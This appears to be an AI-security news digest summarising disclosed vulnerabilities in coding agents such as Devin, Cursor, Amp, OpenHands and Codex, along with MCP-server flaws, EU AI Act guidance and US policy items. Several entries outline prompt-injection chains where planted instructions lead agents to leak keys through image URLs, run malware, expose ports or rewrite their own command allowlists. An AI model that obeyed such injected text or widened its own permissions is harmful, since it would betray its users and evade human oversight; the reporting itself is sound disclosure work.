New tools, products, platforms, funding rounds, and company developments in AI security.
OpenHands, an AI agent tool created by All-Hands AI, has a vulnerability where it can render images in chat conversations, which attackers can exploit through prompt injection (tricking an AI by hiding instructions in its input) to leak access tokens (security credentials that grant permission to use services) without requiring user interaction. This type of attack has been called the 'Lethal Trifecta' and represents a significant data exfiltration (unauthorized data theft) risk.
Devin AI, a tool that acts as an AI software engineer, is vulnerable to prompt injection (tricking an AI by hiding malicious instructions in its input) attacks that can lead to full system compromise. By planting malicious instructions on websites or GitHub issues that Devin reads, attackers can trick it into downloading and running malware, giving them remote control over Devin's DevBox (the sandboxed environment where Devin operates) and access to any stored secrets.
Cursor IDE (an AI-powered code editor) has a vulnerability where it can render Mermaid diagrams (a tool for creating flowcharts and diagrams from simple text) that include external image requests without user confirmation. An attacker can use prompt injection (tricking the AI by hiding malicious instructions in code comments or other inputs) to embed image URLs in these diagrams, allowing them to steal sensitive data like API keys or user memories by encoding that information in the URL sent to an attacker-controlled server.
Anthropic's filesystem MCP server (a tool that lets AI assistants like Claude access your computer's files) had a path validation vulnerability where it only checked if a file path started with an allowed directory name, rather than confirming it was actually in that directory. This meant if you allowed access to /mnt/finance/data, the AI could also access sibling files like /mnt/finance/data-archived because the path string starts the same way.
On July 18, 2025, the European Commission released draft Guidelines that explain how the EU AI Act applies to General Purpose AI models (GPAI, which are flexible AI systems that can handle many different tasks). The Guidelines define GPAI models based on a compute threshold (10²³ FLOPs, or floating point operations, a measure combining model size and training data size), require providers to document their models and report serious incidents, and impose stricter obligations on very large models trained with 10²⁵ FLOPs or more. Providers of these large models must notify the Commission within two weeks and can request reassessment of their systemic risk classification if they provide evidence the model is not actually risky.
The Code of Practice is a framework that helps developers of General Purpose AI models (large AI systems designed for many different tasks) comply with EU AI Act requirements, though following it is voluntary. New GPAI models released after August 2, 2025 must comply immediately, while older models have until August 2, 2027, with enforcement actions delayed until August 2, 2026 to give developers time to adjust.
The U.S. Senate voted 99-1 to remove a provision from a Republican bill that would have prevented states from regulating AI if they wanted to receive federal broadband expansion funds. The provision was weakened by Senate rules that limited it to only $500 million in new funding rather than $42.45 billion in total broadband funds, making it less likely states would comply even if it had passed.
This content discusses security challenges in agentic AI (AI systems that can act autonomously and use tools), emphasizing that generic jailbreak testing (attempts to trick AI into ignoring safety guidelines) misses real operational risks like tool misuse and data theft. The articles highlight that enterprises need contextual red teaming (security testing that simulates realistic attack scenarios relevant to how the AI will actually be used) and governance frameworks like identity controls and boundaries to secure autonomous AI systems.
Devin AI has a tool called expose_port that can publish local computer ports to the public internet, intended for testing websites during development. However, attackers can use prompt injection (tricking an AI by hiding instructions in its input) to manipulate Devin into exposing sensitive files and creating backdoor access without human approval, as demonstrated through a multi-stage attack that gradually steers the AI toward malicious actions.
Devin AI can be tricked into leaking sensitive information to attackers through multiple methods, including using its Shell tool to run data-stealing commands, using its Browser tool to send secrets to attacker-controlled websites, rendering images from untrusted domains, and posting hidden data to connected services like Slack. These attacks work because Devin has unrestricted internet access and can be manipulated through indirect prompt injection (tricking an AI by hiding malicious instructions in its input), where attackers embed instructions in places like GitHub issues that Devin investigates.
Amp, an AI coding agent by Sourcegraph, had a vulnerability where it could modify its own configuration files to enable arbitrary command execution (running any code on a developer's machine) through two methods: adding bash commands to an allowlist or installing malicious MCP servers (external programs the AI can invoke). This could be exploited by the AI itself or through prompt injection attacks (tricking the AI by hiding malicious instructions in its input).
Fix: Make sure to run the latest version Amp ships frequently. The vulnerability was identified in early July, reported to Sourcegraph, and promptly fixed by the Amp team.
Embrace The RedFix: Anthropic rewrote the filesystem server to support the roots feature of MCP, and this updated release fixed the vulnerability. The vulnerability is tracked as CVE-2025-53109.
Embrace The RedChatGPT Codex, a cloud-based AI tool that answers code questions and writes software, is vulnerable to prompt injection (tricking an AI by hiding instructions in its input) attacks that can turn it into a botnet (a network of compromised computers controlled remotely). An attacker can exploit the "Common Dependencies Allowlist" feature, which allows Codex internet access to certain approved servers, by hosting malicious code on Azure and injecting fake instructions into GitHub issues to hijack Codex and steal sensitive data or run malware.
Fix: Review the allowlist for the Dependency Set and apply a fine-grained approach. OpenAI recommends only using a self-defined allowlist when enabling Internet access, as Codex can be configured very granularly. Additionally, consider installing EDR (endpoint detection and response, security software that monitors suspicious activity) and other monitoring software on AI agents to track their behavior and detect if malware is installed.
Embrace The RedA researcher discovered that ChatGPT's 'safe URL' feature, which is supposed to prevent data theft, can be bypassed using prompt injection (tricking an AI by hiding malicious instructions in its input). By exploiting this bypass, an attacker can trick ChatGPT into sending sensitive information like your chat history and memories to a server they control, especially if you ask ChatGPT to process untrusted content like PDFs or websites.
The Trump Administration released an AI Action Plan with policies across three areas: accelerating innovation, building infrastructure, and international leadership. While the plan primarily focuses on speeding up US AI development, it also includes several AI safety policies such as investing in AI interpretability (how AI systems make decisions), building evaluation systems to test AI safety, strengthening cybersecurity, and controlling exports of powerful AI chips.
The Month of AI Bugs 2025 is an initiative to expose security vulnerabilities in agentic AI systems (AI that can take actions on its own), particularly coding agents, through responsible disclosure and public education. The campaign will publish over 20 blog posts demonstrating exploits, including prompt injection (tricking an AI by hiding malicious instructions in its input) attacks that can allow attackers to compromise a developer's computer without permission. While some vendors have fixed reported vulnerabilities quickly, others have ignored reports for months or stopped responding, and many appear uncertain how to address novel AI security threats.
Meta's new Llama 4 models (Scout and Maverick) were tested for security vulnerabilities using Protect AI's Recon tool, which runs 450+ attack prompts across six categories including jailbreaks (attempts to make AI ignore safety rules), prompt injection (tricking an AI by hiding instructions in its input), and evasion (using obfuscation to hide malicious requests). Both models received medium-risk scores (Scout: 58/100, Maverick: 52/100), with Scout showing particular vulnerability to jailbreak attacks at 67.3% success rate, though Maverick demonstrated better overall resilience.
The EU published a General-Purpose AI Code of Practice in July 2025 to clarify how AI developers should comply with the EU AI Act's safety requirements, which had been ambiguously worded. The Code establishes a three-step framework for identifying, analyzing, and determining whether systemic risks (including CBRN threats, loss of control, cyber attacks, and harmful manipulation) are acceptable before deploying large AI models, along with requirements for continuous monitoring and incident reporting.
Fix: The EU General-Purpose AI Code of Practice provides a structured approach requiring GPAI providers to: (1) Identify potential systemic risks in four categories (CBRN, loss of control, cyber offense capabilities, and harmful manipulation), (2) Analyze each risk using model evaluations and third-party evaluators when necessary, (3) Determine whether risks are acceptable and implement safety and security mitigations if not, and (4) conduct continuous monitoring after deployment with strict incident reporting timelines.
CAIS AI Safety NewsletterGoogle is automatically enabling its Gemini AI to access third-party apps like WhatsApp on Android devices, overriding previous user settings that blocked such access. Users who want to prevent this must take action, though Google's guidance on how to fully disable Gemini integrations is unclear and confusing, with the company stating that even when Gemini access is blocked, data is still stored for 72 hours.
Fix: According to a Tuta researcher cited in the article, disabling Gemini app activity is likely to prevent data collection beyond the 72-hour temporary storage period. Additionally, if the Gemini app is not already installed on a device, it will not be installed after the change takes effect.
Ars Technica (Security)Anthropic's Slack MCP Server (a tool that lets AI agents interact with Slack) has a vulnerability where it doesn't disable link unfurling, a feature that automatically previews hyperlinks in messages. An attacker can use prompt injection (tricking an AI by hiding instructions in its input) to make an AI agent post a malicious link to Slack, which then leaks sensitive data like API keys to the attacker's server when Slack's systems automatically fetch the preview.
Runtime attacks on large language models are rapidly increasing, with jailbreak techniques (methods that bypass AI safety restrictions) and denial-of-service exploits (attacks that make systems unavailable) becoming more sophisticated and widely shared through open-source platforms like GitHub. The report explains that these attacks have evolved from isolated research experiments into organized toolkits accessible to threat actors, affecting production AI deployments across enterprises.